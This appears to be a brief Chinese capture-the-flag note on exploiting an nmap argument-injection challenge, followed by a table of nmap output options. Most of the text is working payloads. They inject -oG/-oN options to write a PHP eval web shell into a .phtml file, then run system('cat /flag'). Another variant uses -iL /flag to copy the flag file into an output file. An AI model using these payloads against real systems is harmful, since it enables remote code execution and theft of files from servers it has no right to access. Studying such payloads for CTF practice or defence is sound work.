'  -oG 1.phtml //' -oG 1.phtml  @eval($_POST[a]); ?> 进入1.phtml a=system("cat /flag"); 

或者

' -oN 2.phtml ' 进入1.phtml hack=system("cat /flag"); 

或者

127.0.0.1' -iL /flag -oN vege.txt ' //读取/flag里的ip，在这里是flag内容，把flag以标准方式存储vege.txt 

选项 解释
-oN 标准保存
-oX XML保存
-oG Grep保存
-oA 保存到所有格式